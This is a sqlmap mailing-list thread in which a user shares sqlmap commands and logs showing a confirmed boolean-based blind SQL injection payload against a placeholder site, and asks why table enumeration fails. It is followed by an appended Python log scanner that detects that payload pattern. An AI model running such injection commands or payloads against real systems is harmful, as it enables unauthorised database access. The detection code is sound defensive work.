Please send me privately the content of the traffic file for such a run (just
append -t traffic.txt to a problematic run).
Kind regards,
Miroslav Stampar
On Dec 15, 2012 5:10 PM, "Volker Nebelung" <volker.nebel...@rwth-aachen.de>
wrote:
> Hi,
>
> I am using sqlmap to scan a specific GET parameter of a target site. I
> know there is a SQL injection in parameter 2:
>
> python sqlmap.py -u "http://example.net/de/de*/site" --batch
>
> sqlmap gives me the following result:
>
> > …
> > [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be
> injectable (possible DBMS: Microsoft Access)
> > [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
> > [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> > [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind -
> WHERE or HAVING clause' injectable
> > [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS
> could be Microsoft Access. Do you want to skip test payloads specific for
> other DBMSes? [Y/n] Y
> > [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> > [16:36:29] [INFO] automatically extending ranges for UNION query
> injection technique tests as there is at least one other potential
> injection technique found
> > [16:37:05] [INFO] checking if the injection point on URI parameter '#1*'
> is a false positive
> > [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep
> testing the others (if any)? [y/N] N
> > sqlmap identified the following injection points with a total of 34
> HTTP(s) requests:
> > ---
> > Place: URI
> > Parameter: #1*
> > Type: boolean-based blind
> > Title: AND boolean-based blind - WHERE or HAVING clause
> > Payload: http://example.net:80/de/de' AND 9199=9199 AND
> 'tyFW'='tyFW/site
> > ---
> > [16:37:11] [INFO] testing Microsoft Access
> > [16:37:13] [INFO] confirming Microsoft Access
> > [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
> > [16:37:14] [INFO] testing MySQL
> > [16:37:16] [WARNING] the back-end DBMS is not MySQL
> > [16:37:16] [INFO] testing Oracle
> > [16:37:17] [WARNING] the back-end DBMS is not Oracle
> > [16:37:17] [INFO] testing PostgreSQL
> > [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
> > [16:37:18] [INFO] testing Microsoft SQL Server
> > [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
> > [16:37:19] [INFO] testing SQLite
> > [16:37:20] [WARNING] the back-end DBMS is not SQLite
> > [16:37:20] [INFO] testing Firebird
> > [16:37:21] [WARNING] the back-end DBMS is not Firebird
> > [16:37:21] [INFO] testing SAP MaxDB
> > [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
> > [16:37:22] [INFO] testing Sybase
> > [16:37:23] [WARNING] the back-end DBMS is not Sybase
> > [16:37:23] [INFO] testing IBM DB2
> > [16:37:24] [WARNING] the back-end DBMS is not IBM DB2
> > [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end
> database management system, but from the HTML error page it was possible to
> determinate that the back-end DBMS is Microsoft Access. Do not specify the
> back-end DBMS manually, sqlmap will fingerprint the DBMS for you
> > [16:37:24] [WARNING] HTTP error codes detected during testing:
> > 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
> >
> > [*] shutting down at 16:37:24
>
> I am confused at this point: Is sqlmap thinking that the DBMS is MS Access
> or not?
> When I manually try the following URL in my browser "
> http://example.net/de/de'/site" I get a 500 HTML-page with output
> "Microsoft JET Database Engine Error …" so I would say the DBMS is MS
> Access.
> When I now try to get for example all tables, then the following happens:
>
> > python sqlmap.py -u "example.net/de/de*/site" --batch --tables
> >
> > sqlmap/1.0-dev-0664e72 - automatic SQL injection and database
> takeover tool
> > http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by this
> program
> >
> > [*] starting at 16:38:02
> >
> > [16:38:05] [INFO] custom injection marking character ('*') found in
> option '-u'. Do you want to process it? [Y/n/q] Y
> > [16:38:05] [INFO] testing connection to the target url
> > sqlmap identified the following injection points with a total of 0
> HTTP(s) requests:
> > ---
> > Place: URI
> > Parameter: #1*
> > Type: boolean-based blind
> > Title: AND boolean-based blind - WHERE or HAVING clause
> > Payload: http://example.net:80/de/de' AND 9199=9199 AND
> 'tyFW'='tyFW/site
> > ---
> > [16:38:07] [INFO] testing MySQL
> > [16:38:08] [INFO] heuristics detected web page charset 'ascii'
> > [16:38:08] [WARNING] the back-end DBMS is not MySQL
> > [16:38:08] [INFO] testing Oracle
> > [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
> > [16:38:09] [WARNING] the back-end DBMS is not Oracle
> > [16:38:09] [INFO] testing PostgreSQL
> > [16:38:10] [WARNING] reflective value(s) found and filtering out
> > [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
> > [16:38:10] [INFO] testing Microsoft SQL Server
> > [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
> > [16:38:11] [INFO] testing SQLite
> > [16:38:12] [WARNING] the back-end DBMS is not SQLite
> > [16:38:12] [INFO] testing Microsoft Access
> > [16:38:12] [INFO] confirming Microsoft Access
> > [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
> > [16:38:13] [INFO] testing Firebird
> > [16:38:14] [WARNING] the back-end DBMS is not Firebird
> > [16:38:14] [INFO] testing SAP MaxDB
> > [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
> > [16:38:15] [INFO] testing Sybase
> > [16:38:16] [WARNING] the back-end DBMS is not Sybase
> > [16:38:16] [INFO] testing IBM DB2
> > [16:38:17] [WARNING] the back-end DBMS is not IBM DB2
> > [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end
> database management system. Support for this DBMS will be implemented at
> some point
> > [16:38:17] [WARNING] HTTP error codes detected during testing:
> > 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
> >
> > [*] shutting down at 16:38:17
>
> Even when I try to use the --text-only or --not-string switches I am not able
> to receive the tables. Any ideas?
>
>
> Best regards
>
> Volker Nebelung
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
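Added example (not part of the original thread and not sqlmap code): the Python below shows what the run quoted above looks like from the server side, scanning access-log lines for the boolean-based blind pattern in the URI path (numeric comparisons sent in true/false pairs plus a quoted-string tautology) and counting the 400/500 responses they trigger. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed access-log lines (not from the thread); addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [15/Dec/2012:16:36:20 +0100] "GET /de/de/site HTTP/1.1" 200 5120
198.51.100.7 - - [15/Dec/2012:16:36:21 +0100] "GET /de/de'/site HTTP/1.1" 500 1210
198.51.100.7 - - [15/Dec/2012:16:36:22 +0100] "GET /de/de'%20AND%209199=9199%20AND%20'tyFW'='tyFW/site HTTP/1.1" 200 5120
198.51.100.7 - - [15/Dec/2012:16:36:23 +0100] "GET /de/de'%20AND%209199=4471%20AND%20'tyFW'='tyFW/site HTTP/1.1" 500 1210
203.0.113.9 - - [15/Dec/2012:16:36:24 +0100] "GET /de/de/site?q=rock%20and%20roll HTTP/1.1" 200 5120
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
NUM_CMP = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*(\d+)", re.I)  # AND 9199=9199
STR_CMP = re.compile(r"'(\w+)'\s*=\s*'(\w+)")                    # 'tyFW'='tyFW

def probe_reasons(raw_target):
    """Return the boolean-blind indicators found in one request target."""
    target = unquote(raw_target)          # payloads usually arrive URL-encoded
    reasons = []
    m = NUM_CMP.search(target)
    if m:
        reasons.append("numeric-true" if m.group(1) == m.group(2) else "numeric-false")
    m = STR_CMP.search(target)
    if m and m.group(1) == m.group(2):
        reasons.append("string-tautology")
    if "'" in target.split("?", 1)[0]:    # weak signal: bare quote in the path
        reasons.append("quote-in-path")
    return reasons

def summarize(log_text):
    """Per client: suspicious requests, how many ended in 400/500, indicator kinds."""
    stats = defaultdict(lambda: {"probes": 0, "errors": 0, "kinds": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        reasons = probe_reasons(m.group(2)) if m else []
        if not reasons:
            continue
        entry = stats[m.group(1)]
        entry["probes"] += 1
        entry["kinds"].update(reasons)
        entry["errors"] += int(m.group(3)) in (400, 500)
    return dict(stats)

def flagged_clients(log_text):
    """Clients that sent both a true and a false numeric comparison."""
    pair = {"numeric-true", "numeric-false"}
    return sorted(c for c, s in summarize(log_text).items() if pair <= s["kinds"])
```

A client that sends both the true and the false form of the same comparison is a far stronger signal than a single stray quote, which is why `flagged_clients` keys on the pair.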